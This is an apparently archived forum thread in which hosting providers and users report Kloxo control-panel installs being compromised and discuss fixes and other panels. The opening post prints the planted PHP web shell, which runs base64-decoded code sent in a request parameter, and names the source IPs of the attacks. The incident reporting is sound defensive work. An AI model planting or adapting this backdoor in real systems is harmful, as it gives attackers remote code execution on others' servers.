Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


Kloxo installations compromised
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Kloxo installations compromised

DamianDamian Member
edited January 2014 in General

We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.

Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.

UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=

This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):

<?php > set_time_limit(0);error_reporting(NULL); > if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));} > else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\">Access denied.';} > ?>

Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.

All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's effected Ramnode, if not others. Beware!

Thanked by 3vedran Janevski Mark_R
«1

Comments

  • We just got done suspending a good 15 or so VPS for this issue. Killed CPU on nodes, network was acting up because of how many it was but it was on average 30-45k pps per VPS.

  • boerndboernd Member
    edited January 2014

    @Damian said:

    All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

    It seems this server is still online.
    You should send a mail to [email protected] with logs attached.

  • vRozenSch00nvRozenSch00n Member
    edited January 2014

    My test VPS was also compromised with the same issue, and I found out from the log that they brute forced the control panel login.

    Edit: the log shows that it comes from IP 178.248.23.39

  • How is VestaCP? Is it more secure than Kloxo?

  • zhuanyi said: How is VestaCP? Is it more secure than Kloxo?

    So far no problem with VestaCP .

    AFAIK the vulnerability is an old issue that until now has not been settled:

    http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646&#msg_102646

  • jarjar Patron Provider, Top Host, Veteran

    Affecting kloxo-mr as well?

  • @jarland said:
    Affecting kloxo-mr as well?

    Considering the developer of Kloxo-MR posted the the patch/fix on lx forums years ago I'm sure it'd be fine.

    Thanked by 2Spirit jar
  • vRozenSch00nvRozenSch00n Member
    edited January 2014

    jarland said: Affecting kloxo-mr as well?

    No. Kloxo-MR was a fork that has the security in mind.

    Emergency solution for a personal installation, add httpaswd to lighttpd, or change the file as presented in the old lxcenter forum above, or better ask @mustafaramadhan

    Thanked by 1jar
  • Got a Nice email from BuyVM about this... What was so appealing about Kloxo anyway? A command line seems to be all a reasonable intelligent person would need...

  • Seems like an odd piece of software to 'target', I hadn't heard of it until now.

  • @ricardo said:
    Seems like an odd piece of software to 'target', I hadn't heard of it until now.

    On the contrary, it's a rather populate template for VPS providers, or at least it used to be.

  • Got a nice email from WeLoveServers as well about this issue

  • Oh crap!

  • @ricardo said:
    Seems like an odd piece of software to 'target', I hadn't heard of it until now.

    Tell that to the 29% of computer owners still running Windows XP.

  • This is patch/fix in Kloxo-MR related to security issue (mostly from Kloxo Official):

    • fix possible sql-injection on login and API
    • fix switch 'safe' and 'unsafe' mode
    • disable/remove '/usr/bin/lxsuexec' and '/usr/sbin/lxrestart'
    • update suphp config (possible security issue)
    • fix lxguard for detect ftp login
    • change lxphp+lxlighttpd to php52s+hiawatha
    • fix security bug for php-fpm (add open_basedir)
    Thanked by 1mpkossen
  • I had Kloxo-MR installed on my INIZ VPS. They emaiked me to remove Kloxo or be suspended. I complied and appreciated the warning but not the heavy-handed threat even though I was running the MR fork without the vulnerability.

  • @cpaquette said:
    I had Kloxo-MR installed on my INIZ VPS. They emaiked me to remove Kloxo or be suspended. I complied and appreciated the warning but not the heavy-handed threat even though I was running the MR fork without the vulnerability.

    Send Information from http://pastie.org/pastes/8677127 to your provider. Also better information of 'sh /script/sysinfo'.

  • Why would people use kloxo anyway?

  • The question is how they (providers) know where we are using Kloxo?. Because scanning port?.

    So, what's happen if change Kloxo/Kloxo-MR access port (from 7777/7778 to 8777/87778 or others)?.

  • joepie91joepie91 Member, Patron Provider

    @mustafaramadhan said:
    The question is how they (providers) know where we are using Kloxo?. Because scanning port?.

    So, what's happen if change Kloxo/Kloxo-MR access port (from 7777/7778 to 8777/87778 or others)?.

    I presume that Kloxo is mostly used as an OpenVZ template. OpenVZ lets a provider access the VPS filesystem, so they could just identify a file that is unique to Kloxo, and they'd be able to tell that a certain VPS is running Kloxo (without actually looking at any file contents).

    Thanked by 1mustafaramadhan
  • Why install a cp on a lowendbox?

  • I would bet cvps would be last to act on this.

  • Kloxo used to be very good, until the updates stopped and the bugs piled up. The community was active before, but it never really got the traction that other cp's from its generation gained.

  • kyakykyaky Member
    edited January 2014

    @zhuanyi said:
    How is VestaCP? Is it more secure than Kloxo?

    I've been using VestaCP for production for weeks. Not a single problem yet. very good. especially with their tons of CLI commands, you can do more than what the interface provides. more functions than their GUI. when you type "v-" and press [TAB], 260+ commands show up.

    Thanked by 2vRozenSch00n zhuanyi
  • kyakykyaky Member
    edited January 2014

    Did anyone say the author of Kloxo committed a suicide? or sth ? can't remember

  • @Spirit said:

    holy ****. that's terrible.

  • linuxglobelinuxglobe Member
    edited January 2014

    I use Kloxo-Mr on my few vps's, and I never had any problem. Is stable,and secure, not like the Kloxo official version. Thanks for Mustafa!

  • I use Webuzo free version and it's really good so far. If you don't need clients (sub-accounts) I suggest you use it as well.

  • Kind of glad I migrated away from Kloxo to VestaCP.

    Also, i've seen a few people asking why people install panels especially on LE* VPS. Personally, I use panels because I like a GUI better than command line. It's simpler and a lot faster than remembering lines and lines of commands. Plus, it's more user friendly especially if you are hosting friends/family/etc's websites.

    Side note, on one of my 512mb VPS, i'm running VestaCP with 12 websites and i'm only using ~84mb of ram (or ~16%).

Sign In or Register to comment.